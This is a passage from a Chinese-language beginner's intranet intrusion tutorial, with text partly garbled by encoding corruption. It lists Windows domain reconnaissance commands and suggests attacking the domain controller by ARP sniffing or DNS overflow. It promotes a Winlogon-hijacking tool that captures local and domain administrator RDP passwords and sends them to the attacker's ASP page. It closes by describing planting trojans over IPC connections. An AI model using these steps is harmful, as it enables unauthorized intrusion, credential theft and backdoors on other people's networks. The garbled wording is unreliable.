   為了大家好理解， 我這里舉個(gè)例子， 例如一個(gè)內(nèi)網(wǎng)是一個(gè)大樓， 而每層的每個(gè)房間是一臺(tái)計(jì)算機(jī)， 當(dāng)然每個(gè)房間的鑰匙只有房間的主人才擁有， 但大樓建立一個(gè)保安室， 而這保安室為了治理利便有一把可以打開任意房間的鑰匙。 前題是這個(gè)房間答應(yīng)加入保安的治理范圍內(nèi)， 這個(gè)保安室就是域控制器， 當(dāng)然在形象的說(shuō)大樓可以是10層， 而每一層都有一個(gè)保安室， 也可以有一個(gè)總的保安室。 當(dāng)然在往大的說(shuō)也可以有良多大樓， 大樓與大樓之間為了利便也可以建立共享。 如流動(dòng)目錄的域， 流動(dòng)目錄可以貫串一個(gè)或多個(gè)域。 在獨(dú)立的計(jì)算機(jī)上， 域即指計(jì)算機(jī)本身， 一個(gè)域可以分布在多個(gè)物理位置上， 同時(shí)一個(gè)物理位置又可以劃分不同網(wǎng)段為不同的域， 每個(gè)域都有自己的安全策略以及它與其他域的信任關(guān)系。 當(dāng)多個(gè)域通過(guò)信任關(guān)系連接起來(lái)之后， 流動(dòng)目錄可以被多個(gè)信任域域共享。 在往回說(shuō)每臺(tái)機(jī)器像一個(gè)樹葉， 而我們控制了樹葉， 還想控制樹杈， 而最后還想控制這個(gè)大樹， 這時(shí)候就到域根了。 而一棵樹是在一片森林當(dāng)中的。

　　在入侵內(nèi)網(wǎng)的時(shí)候， 一般先用net view查看內(nèi)網(wǎng)的情況， 列出共享的域、計(jì)算機(jī)或資源的列表。 如圖44所示。 如何判定有沒有域呢， 實(shí)在一個(gè)ipconfig /all基本就看出來(lái)了， 大家在回到圖7當(dāng)中， 留意一下第二項(xiàng)， 也就是Primary Dns Suffix這項(xiàng)， 從這個(gè)命令我們可以得知， 存在一個(gè)域xxxx-cc.com， 我們ping一下域xxxx-cc.com， 得到域服務(wù)器的ip。 如圖45所示。 或者用命令net config workstation， 會(huì)顯示本機(jī)計(jì)算機(jī)名和治理員用戶名， 工作站的域DNS名稱及登錄到的域， 如圖46所示。

　　接著執(zhí)行net localgroup administrators來(lái)看一下本機(jī)在域里面的角色， 如圖47所示。 看來(lái)只是一個(gè)普通域用戶。 我們?cè)賮?lái)查看一下域里面有多少的用戶， 執(zhí)行net user /domain， 域里面的用戶良多， 如圖48所示。 域里面這么多用戶， 那么我們?cè)俨榭匆幌掠蛑卫韱T有哪些， 執(zhí)行net group "domain admins" /domain， 貌似只有一個(gè)域治理員。 如圖49所示。

　　大家知道在域治理網(wǎng)絡(luò)中只要搞定了域治理員內(nèi)網(wǎng)一切機(jī)器都OK了， 現(xiàn)在域服務(wù)器有了， 域治理員有了。 思路呢？可以用上面的幾種方法來(lái)入侵域服務(wù)器， 如arp嗅探域服務(wù)器， 而域治理器在良多時(shí)候也是DNS服務(wù)器， 也可以嘗試DNS溢出等。 這里我為大家推薦一個(gè)Winlogon劫持記實(shí)3389密碼小工具， 原作者為“lovemfc”， 我們用這個(gè)不是記實(shí)本機(jī)登錄的3389密碼， 當(dāng)然本機(jī)也是可以記實(shí)的， 更不錯(cuò)的是可以記實(shí)域治理員登錄本機(jī)的密碼， 由于域治理員是有權(quán)限登錄下面每臺(tái)用戶的機(jī)器的。 缺點(diǎn)是記實(shí)密碼的東西只能保留本機(jī)上， 而ASM根據(jù)這個(gè)寫了一個(gè)發(fā)信版的天生器， 這就利便我們大家了， 程序運(yùn)行后如圖50。

　選擇好接受的ASP地址后， 天生出來(lái)CreateServer.exe， 直接在服務(wù)器上運(yùn)行即可， post.asp會(huì)在你的URL地址下天生key.txt。 合用范圍2003系統(tǒng)， 圖51是我記實(shí)到本機(jī)治理員和域治理員的密碼， 這下就可以縱橫整個(gè)內(nèi)網(wǎng)了。 在服務(wù)器上掃描開放3389端口的， 用域治理員登錄全部OK， 在域控的環(huán)境中， 我們只要得到域控密碼也可以直接用ipc連接治理員機(jī)器種馬。 最后登錄內(nèi)網(wǎng)幾臺(tái)機(jī)器抓圖紀(jì)念一下， 如圖52。

　　最后說(shuō)一下本文章只做菜鳥滲透滲出入門文章， 當(dāng)然內(nèi)網(wǎng)滲透滲出還有其他深入的技巧， 如主動(dòng)會(huì)話劫持等， 因本人時(shí)間和水平都有限， 文章中不足之處歡迎大家批評(píng)指正。 菜菜朋友們?cè)谖恼轮腥缬蓄}目聯(lián)系我可以去非安全官方網(wǎng)站， ID：櫻花浪子。